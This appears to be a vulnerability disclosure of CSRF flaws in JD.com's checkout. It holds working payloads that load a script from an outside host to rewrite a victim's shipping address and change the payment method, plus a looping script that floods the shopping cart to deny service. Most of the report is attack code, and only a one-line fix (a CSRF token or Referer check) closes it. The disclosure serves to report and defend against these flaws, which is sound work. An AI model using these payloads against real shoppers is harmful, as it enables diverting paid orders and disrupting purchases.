There are multiple CSRF vulnerabilities, which can be abused in many ways.

1. Modify the shipping address. When there is only one shipping address in the account, many users do not check the shipping address and pay directly.

    <script src=http://mmme.me/xss.js></script>
    <script>
    xss.ajax('http://trade.jd.com/consignee/saveConsignee.action',
             'consigneeParam.id=0&consigneeParam.type=1&consigneeParam.name=xxxkkk&consigneeParam.provinceId=15&consigneeParam.cityId=1158&consigneeParam.countyId=3413&consigneeParam.townId=46422&consigneeParam.address=bbbbbbbbbbbbbb&consigneeParam.mobile=13100000000&consigneeParam.email=&consigneeParam.phone=&consigneeParam.provinceName=Zhejiang&consigneeParam.cityName=Ningbo&consigneeParam.countyName=Jiangdong District&consigneeParam.townName=Bai he Street&consigneeParam.commonConsigneeSize=1&consigneeParam.isUpdateCommonAddress=1');
    </script>

2. Modify the payment method. Changing the payment method has little impact: it can be switched to cash on delivery, with delivery on business days, weekends and holidays.

    <script src=http://mmme.me/xss.js></script>
    <script>
    xss.ajax('http://trade.jd.com/payAndShip/savePayAndShip.action',
             'saveParam.paymentId=1&saveParam.jdShipmentType=65&saveParam.jdShipTime=3&saveParam.jdbeforenoworkflow=0&saveParam.jdPayWayId=1');
    </script>

3. Shopping-cart CSRF denial of service. A CSRF fills the shopping cart so that the normal shopping flow can no longer be completed.

    (ddos = function () {
        var i;
        for (i = 530000; i <= 532000; i++) {
            xss.csrf('http://gate.jd.com/InitCart.aspx?pcount=100000000&ptype=1&pid=' + i);
        }
    }).call(this);

The effect is as follows: normal goods can no longer be added to the shopping cart.
Solution:
Add a CSRF token to the form, or verify the Referer header.